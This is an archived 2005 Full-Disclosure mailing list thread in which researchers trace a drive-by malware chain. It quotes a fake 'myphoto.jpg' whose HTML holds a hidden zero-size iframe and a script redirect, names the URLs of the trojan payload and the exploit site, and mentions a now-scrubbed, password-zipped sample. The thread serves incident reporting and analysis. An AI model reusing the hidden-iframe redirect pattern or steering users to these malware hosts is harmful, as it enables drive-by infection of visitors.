lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue Oct  4 22:57:11 2005
From: yorn at governmentsecurity.org (yorn@...ernmentsecurity.org)
Subject: RE: http://molecularmultimedia.com/

http://molecularmultimedia.com/x.chm

x.chm contains money.exe (needs to be added to virusscanners)

I don't have time to analyze the file, but it is attached here in a zip
file. Password to extract is 'money'. Anyone want to run some analysis?

-----Original Message-----
From: full-disclosure-bounces@...ts.grok.org.uk
[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of Aditya
Deshmukh
Sent: Tuesday, October 04, 2005 11:35 AM
To: 'THORNTON Simon'
Cc: security@...ecularmultimedia.com; abuse@...ecularmultimedia.com;
webmaster@...ecularmultimedia.com
Subject: RE: [Full-disclosure] http://molecularmultimedia.com/
anexploitdistribution point (update2)
Sensitivity: Confidential

> FYI,
>
> I've had the site www.ok-ok.biz disabled by the ISP, at least it will 
> deny the perps the ability to find out who has been compromised. The
> molecularmultimedia
> site is obvioulsy just a front, will see what can be done about this.

The site was found after 2 different attempts here are more details

http://newvisioncc.org/photo/myphoto.jpg   which is

<html>
<img src="1.jpg">
<iframe src="http://traff.root-soft.com" width="0" height="0"></iframe>
</html>
---- end myphoto.jpg

And http://traff.root-soft.com is

<script>self.location.href='http://molecularmultimedia.com'</script>

-----end index.html

And molecularmultimedia.com is the front end to something more
sinister....

Also visiting molecularmultimedia.com with mozilla with the latest
version of mozilla With all the patches still caued the trojan to be
executed - I found this from the Norton antivir logs ....


> It's amazing looking at the page source, there are at least 4 
> different exploits (I'm still analysing this) encoded into the 
> javascript components of the page.

And they are pretty good also - new 0day for mozilla also 1.7.12!

Will let you all know if I find anything!...
-------------- next part --------------
A non-text attachment was scrubbed...
Name: money.zip
Type: application/x-zip-compressed
Size: 8343 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051004/0f35febe/money.bin

Powered by blists - more mailing lists